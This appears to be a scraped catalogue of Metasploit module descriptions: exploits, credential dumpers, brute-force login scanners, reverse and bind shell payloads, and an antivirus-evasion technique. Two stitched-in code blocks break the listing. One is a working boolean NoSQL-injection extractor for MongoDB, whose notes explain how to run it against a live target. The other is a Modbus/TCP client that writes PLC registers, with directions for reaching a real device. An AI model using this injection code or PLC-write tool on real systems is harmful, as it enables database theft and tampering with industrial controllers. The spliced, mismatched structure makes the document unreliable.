D-Link DIR615h OS Command Injection
Some D-Link routers are vulnerable to an authenticated OS command injection in their web interface, where the default credentials are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload...
MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed but a reference to it is kept on the Document and used again during rendering; the freed memory is attacker-controllable, which allows arbitrary code...
Windows Single Sign On Credential Collector (Mimikatz)
This module will collect cleartext Single Sign On credentials from the Local Security Authority using the Kiwi Mimikatz extension. Blank passwords will not be stored in the database. This module requires Metasploit: https://metasploit.com/download Current source:...
Axigen Arbitrary File Read and Delete
This module exploits a directory traversal vulnerability in the WebAdmin interface of Axigen, which allows an authenticated user to read and delete arbitrary files with SYSTEM privileges. The vulnerability is known to work on Windows platforms. This module has been tested successfully on Axigen...
Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution
This module can be used to execute a payload on Movable Type (MT) installations that expose a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), which is used during installation and updating of the platform. The vulnerability arises due to the following properties: 1. This script may be invoked remotely...
WordPress Plugin Advanced Custom Fields Remote File Inclusion
This module exploits a remote file inclusion flaw in the WordPress blogging software plugin known as Advanced Custom Fields. The vulnerability allows for remote file inclusion and remote code execution via the export.php script. The Advanced Custom Fields plug-in versions 3.5.1 and below are...
Microsoft SQL Server SQLi NTLM Stealer
This module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module will use the SQL injection from GET_PATH to connect to the target SQL Server instance and execute the native "xp_dirtree" stored procedure. The stored...
MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution
This module exploits a vulnerability found in SharePoint Server 2007 SP2. The software contains a directory traversal that allows a remote attacker to write arbitrary files to the filesystem by sending a specially crafted SOAP ConvertFile request to the Office Document Conversions Launcher Service...
MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution
This module exploits a type confusion vulnerability in the OLE32 component of Windows XP SP3. The vulnerability exists in the CPropertyStorage::ReadMultiple function. A Visio document with a specially crafted embedded Summary Information Stream allows remote code execution through Internet...
Windows Gather Local User Account Password Hashes (Registry)
This module will dump the local user account password hashes from the SAM database using the registry.
MongoDB Login Utility
This module attempts to brute force authentication credentials for MongoDB. Note that, by default, MongoDB does not require authentication.
VNC Authentication Scanner
This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol versions 3.3, 3.7, 3.8 and 4.001 using the VNC challenge-response authentication method.
Java MixerSequencer Object GM_Song Structure Handling Vulnerability
This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation is done by supplying a specially crafted MIDI file within an RMF file. When the MixerSequencer object is used to play the file, the GM_Song structure is populated with a function pointer...
Windows Recon Computer Browser Discovery
This module uses Railgun to discover hostnames and IPs on the network. LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers), SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers), NOVELL (all Novell servers), PRINTSVR (all Print Que...
Windows Gather Wireless Current Connection Info
This module gathers information about the current connection on each wireless LAN interface on the target machine.
Oracle RDBMS Login Utility
This module attempts to authenticate against an Oracle RDBMS instance using username and password combinations indicated by the USERFILE, PASSFILE, and USERPASSFILE options. Due to a bug, nmap versions 6.50-7.80 may not work.
MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
This module exploits a buffer overflow found in the nsiislog.dll ISAPI filter that ships with Windows Media Server. It will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022.
Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
This module exploits a buffer overflow in Microsoft's Office Web Components. When passing an overly long string as the "HTMLURL" parameter an attacker can execute arbitrary code.
Samba Symlink Directory Traversal
This module exploits a directory traversal flaw in the Samba CIFS server. To exploit this flaw, a writeable share must be specified. The newly created directory will link to the root filesystem.
Sendmail SMTP Address prescan Memory Corruption
This is a proof-of-concept denial of service module for Sendmail versions 8.12.8 and earlier. The vulnerability is within the prescan method when parsing SMTP headers. Because of how the prescan function handles input, only 0x5c and 0x00 bytes can be used, limiting the likelihood of arbitrary code execution. This...
Altap Salamander 2.5 PE Viewer Buffer Overflow
This module exploits a buffer overflow in the Altap Salamander 2.5 PE Viewer. Author: aushack. References: CVE-2007-3314, BID 24557, OSVDB 37579...
Apache Module mod_rewrite LDAP Protocol Buffer Overflow
This module exploits the mod_rewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This module requires REWRITEPATH to be set accurately. In addition, the target must have...
XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
This module exploits a stack buffer overflow in XMPlay 3.3.0.4. The vulnerability is caused by a boundary error within the parsing of playlists containing an overly long file name. This module uses the ASX file format.
MS04-031 Microsoft NetDDE Service Overflow
This module exploits a stack buffer overflow in the NetDDE service, which is the precursor to the DCOM interface. This exploit affects only operating systems released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim that this vulnerability can be exploited without authenticatio...
Diagnostic State
This module will keep the vehicle in a diagnostic state by sending TesterPresent packets in rounds. Module options: msf > use post/hardware/automotive/diagnostic_state; msf post(diagnostic_state) > show actions; ...actions...; msf post(diagnostic_state) > set ACTION; msf post(diagnostic_state) > show options; ...show an...
Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution
This module allows an attacker with a privileged WordPress account to launch a reverse shell via an arbitrary file upload vulnerability (.php upload) in the WordPress plugin Modern Events Calendar. Module options: msf > use exploit/multi/http/wp_plugin_modern_events_calendar_rce; msf...
Micro Focus Operations Bridge Reporter shrboadmin default password
This module abuses a known default password on Micro Focus Operations Bridge Reporter. The 'shrboadmin' user, installed by default by the product, has the password 'shrboadmin', which allows an attacker to log in to the server via SSH. This module has been tested with Micro Focus Operations Bridge...
Process Herpaderping evasion technique
This module allows you to generate a Windows executable that evades security products such as Windows Defender, Avast, etc. It uses the Process Herpaderping technique to bypass antivirus detection. The method consists of obscuring the behavior of a running process by modifying the executable o...
Ubiquiti Configuration Importer
This module imports an Ubiquiti device configuration. The db file within the .unf backup is the data file for UniFi. This module can take either the db file or the .unf.
Cisco UCS Director default scpuser password
This module abuses a known default password on Cisco UCS Director. The 'scpuser' account has the password 'scpuser', which allows an attacker to log in to the virtual appliance via SSH. This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0. Note that Cisco also mentions in...
Unix Command Shell, Pingback Reverse TCP (via netcat)
Creates a socket, sends a UUID, then exits.
Cisco RV320/RV325 Configuration Disclosure
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit th...
MicroFocus Secure Messaging Gateway Remote Code Execution
This module exploits a SQL injection and a command injection vulnerability in MicroFocus Secure Messaging Gateway. An unauthenticated user can execute a terminal command in the context of the web user. One of the user-supplied parameters of an API endpoint is used by the application without input...
lastore-daemon D-Bus Privilege Escalation
This module attempts to gain root privileges on Deepin Linux systems by using lastore-daemon to install a package. The lastore-daemon D-Bus configuration on Deepin Linux permits any user in the sudo group to install arbitrary system packages without providing a password, resulting in code executi...
Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow
This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 by using the import command option to import a specially crafted XML file.
Linux Gather Container Detection
This module attempts to determine whether the system is running inside a container and, if so, which one. It supports detection of Docker, WSL, LXC, Podman and systemd-nspawn.
Linux Meterpreter, Reverse TCP Inline
Runs the Meterpreter / Mettle server payload (stageless).
VMware VDP Known SSH Key
VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known SSH private key for the local user admin, who is a sudoer without password.
NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Buffer Overflow
The NETGEAR WNR2000 router has a stack buffer overflow vulnerability in the hidden_lang_avi parameter. In order to exploit it, it is necessary to guess the value of a certain timestamp which is in the configuration of the router. An authenticated attacker can simply fetch this from a page, but an...
Firefox PDF.js Privileged Javascript Injection
This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.
ManageEngine NetFlow Analyzer Arbitrary File Download
This module exploits an arbitrary file download vulnerability in CSVServlet on ManageEngine NetFlow Analyzer. This module has been tested on both Windows and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you must escape the backslash with a backslash.
MongoDB NoSQL Collection Enumeration Via Injection
This module can exploit NoSQL injections on MongoDB versions less than 2.4 and enumerate the collections available in the database via boolean injections.
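As an added illustration of the boolean-injection technique behind this module (example code, not Metasploit's own), the block below recovers a server-side string one character at a time through a yes/no oracle. The injection point (a `$where` clause built by string concatenation), the probe expression `tojson(db.getCollectionNames())` and the oracle itself are all assumptions: the oracle here is a simulation that evaluates the injected comparison against a constructed collection list instead of sending HTTP requests to a MongoDB-backed application. The extraction does a binary search on the character code, so each character costs about eight requests instead of up to 128.

```python
import json
import re

# Constructed simulation state: what the target's db.getCollectionNames() would return.
COLLECTIONS = ["users", "sessions", "system.indexes"]
SECRET = json.dumps(COLLECTIONS, separators=(",", ":"))

# Hypothetical vulnerable query, built by the application as
#   {"$where": "this.owner == '" + user_input + "'"}
# A quote in user_input closes the literal and lets us OR in our own JS predicate.
# On MongoDB < 2.4 the `db` object was reachable from $where, which is what makes the
# collection list readable from inside the query (assumed probe expression).
PAYLOAD = "' || tojson(db.getCollectionNames()).charCodeAt({idx}) {op} {val} || '"


def build_payload(idx, op, val):
    """Return the string to submit in the injectable parameter."""
    return PAYLOAD.format(idx=idx, op=op, val=val)


_PAT = re.compile(r"charCodeAt\((\d+)\) (<|==) (\d+)")


def oracle(user_input):
    """Stand-in for the HTTP request: True when the injected predicate makes the
    query match (a record is shown), False otherwise. Simulation only: the
    comparison is evaluated against SECRET instead of running JavaScript."""
    m = _PAT.search(user_input)
    if not m:
        return False
    idx, op, val = int(m.group(1)), m.group(2), int(m.group(3))
    if idx >= len(SECRET):
        # JS charCodeAt() past the end yields NaN, and every comparison with NaN is false.
        return False
    code = ord(SECRET[idx])
    return code < val if op == "<" else code == val


def extract(oracle, max_len=512):
    """Recover the probed string via binary search on each character code.
    Returns the string and the number of oracle queries spent."""
    out = []
    queries = 0
    for idx in range(max_len):
        lo, hi = 0, 128  # assume 7-bit ASCII (JSON output of tojson)
        while hi - lo > 1:  # invariant: lo <= code < hi
            mid = (lo + hi) // 2
            queries += 1
            if oracle(build_payload(idx, "<", mid)):
                hi = mid
            else:
                lo = mid
        # lo is the only candidate left; confirming it also detects end of string,
        # because the NaN comparison never equals anything.
        queries += 1
        if not oracle(build_payload(idx, "==", lo)):
            break
        out.append(chr(lo))
    return "".join(out), queries


def enumerate_collections():
    """Drive the extraction and parse the recovered JSON array of collection names."""
    text, queries = extract(oracle)
    return json.loads(text), queries


if __name__ == "__main__":
    names, n = enumerate_collections()
    print(names, "recovered in", n, "queries")
```

Against a live target the `oracle` function would be the only piece to replace: send the request, and decide True/False from whatever observable the application leaks (a row rendered, a different status code, a timing difference). Everything else, including the query budget, carries over unchanged.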
Linux Command Shell, Bind TCP Inline
Listens for a connection and spawns a command shell.
Ruby on Rails Action View MIME Memory Exhaustion
This module exploits a Denial of Service (DoS) condition in Action View that requires a controller action. By sending a specially crafted Content-Type header to a Rails application, it is possible to make it store the invalid MIME type, and it may eventually consume all memory if enough invalid MIMEs a...
GLPI install.php Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the GLPI 'install.php' script. It is set to ManualRanking because it overwrites the target database configuration, which may introduce target instability.
Modbus Client Utility
This module allows reading and writing data to a PLC using the Modbus protocol. It is based on the 'modicon_stop.rb' Basecamp module from Digital Bond, as well as the mbtget Perl script.
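To show what "reading and writing data to a PLC using the Modbus protocol" means on the wire, here is an added example (not the module's own code) that builds and parses Modbus/TCP frames for Read Holding Registers (0x03) and Write Single Register (0x06), and runs them against a constructed in-memory PLC so it works offline. The `FakePlc` class is an assumption standing in for a real device; the frame layout (7-byte MBAP header followed by the PDU) and the exception codes are those of the Modbus/TCP specification. Note what is absent: there is no authentication anywhere in the exchange, which is why a tool like this can read and write registers on any PLC it can reach.

```python
import struct

# Modbus/TCP: MBAP header (transaction id, protocol id = 0, length, unit id) then the PDU
# (function code + data). All integers are big-endian.
FC_READ_HOLDING = 0x03
FC_WRITE_SINGLE = 0x06
EXC_ILLEGAL_FUNCTION = 0x01
EXC_ILLEGAL_ADDRESS = 0x02
EXC_ILLEGAL_VALUE = 0x03


def _frame(tid, unit, pdu):
    """Prefix a PDU with an MBAP header; length counts the unit id byte plus the PDU."""
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def build_read_holding(tid, unit, start, count):
    """Read Holding Registers request: start address and register count."""
    return _frame(tid, unit, struct.pack(">BHH", FC_READ_HOLDING, start, count))


def build_write_single(tid, unit, addr, value):
    """Write Single Register request: address and 16-bit value."""
    return _frame(tid, unit, struct.pack(">BHH", FC_WRITE_SINGLE, addr, value))


def parse_response(frame):
    """Validate the MBAP header and decode a 0x03/0x06 response or an exception."""
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:7])
    pdu = frame[7:]
    if pid != 0 or length != len(pdu) + 1:
        raise ValueError("bad MBAP header")
    fc = pdu[0]
    if fc & 0x80:  # exception responses set the high bit of the function code
        return {"tid": tid, "unit": unit, "fc": fc & 0x7F, "exception": pdu[1]}
    if fc == FC_READ_HOLDING:
        nbytes = pdu[1]
        regs = list(struct.unpack(">%dH" % (nbytes // 2), pdu[2:2 + nbytes]))
        return {"tid": tid, "unit": unit, "fc": fc, "registers": regs}
    if fc == FC_WRITE_SINGLE:
        addr, value = struct.unpack(">HH", pdu[1:5])
        return {"tid": tid, "unit": unit, "fc": fc, "address": addr, "value": value}
    raise ValueError("unhandled function code %#x" % fc)


class FakePlc:
    """Constructed stand-in for a PLC: 16 holding registers and, like real Modbus, no
    authentication or authorization of any kind."""

    def __init__(self):
        self.holding = [0] * 16

    def handle(self, frame):
        tid, _pid, _length, unit = struct.unpack(">HHHB", frame[:7])
        pdu = frame[7:]
        fc = pdu[0]

        def exc(code):
            return _frame(tid, unit, bytes([fc | 0x80, code]))

        if fc == FC_READ_HOLDING:
            start, count = struct.unpack(">HH", pdu[1:5])
            if not 1 <= count <= 125:  # spec limit for one 0x03 request
                return exc(EXC_ILLEGAL_VALUE)
            if start + count > len(self.holding):
                return exc(EXC_ILLEGAL_ADDRESS)
            data = struct.pack(">%dH" % count, *self.holding[start:start + count])
            return _frame(tid, unit, bytes([fc, len(data)]) + data)
        if fc == FC_WRITE_SINGLE:
            addr, value = struct.unpack(">HH", pdu[1:5])
            if addr >= len(self.holding):
                return exc(EXC_ILLEGAL_ADDRESS)
            self.holding[addr] = value
            return _frame(tid, unit, pdu)  # a successful write echoes the request PDU
        return exc(EXC_ILLEGAL_FUNCTION)


def demo():
    """Write 0xBEEF to register 3, read registers 0-4 back, then read past the end."""
    plc = FakePlc()
    w = parse_response(plc.handle(build_write_single(1, 1, 3, 0xBEEF)))
    r = parse_response(plc.handle(build_read_holding(2, 1, 0, 5)))
    bad = parse_response(plc.handle(build_read_holding(3, 1, 14, 5)))
    return w, r, bad


if __name__ == "__main__":
    for resp in demo():
        print(resp)
```

Against a real device, replace `plc.handle(frame)` with a TCP socket to port 502 (send the frame, read back 7 header bytes, then the number of bytes the length field announces). The transaction id is the only thing tying a reply to its request, so increment it per frame when multiplexing.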
SAP SMB Relay Abuse
This module provides several SMB relay abuses through different SAP services and functions. The attack is done through specially crafted requests including a UNC path which will be accessed by the SAP system while trying to process the request. In order to get the hashes the...
Unix Command Shell, Reverse TCP SSL (via Ruby)
Connects back and creates a command shell via Ruby, using SSL.
Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution
This module abuses the "RunScript" procedure provided by the SOAP interface of Adobe InDesign Server to execute arbitrary VBScript (Windows) or AppleScript (OS X). The exploit drops the payload on the server, and it must be removed manually.
Windows AlwaysInstallElevated MSI
This module checks the AlwaysInstallElevated registry keys, which dictate whether .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM). The generated .MSI file has an embedded executable which is extracted and run by the installer. After execution the .MSI file intentionally fai...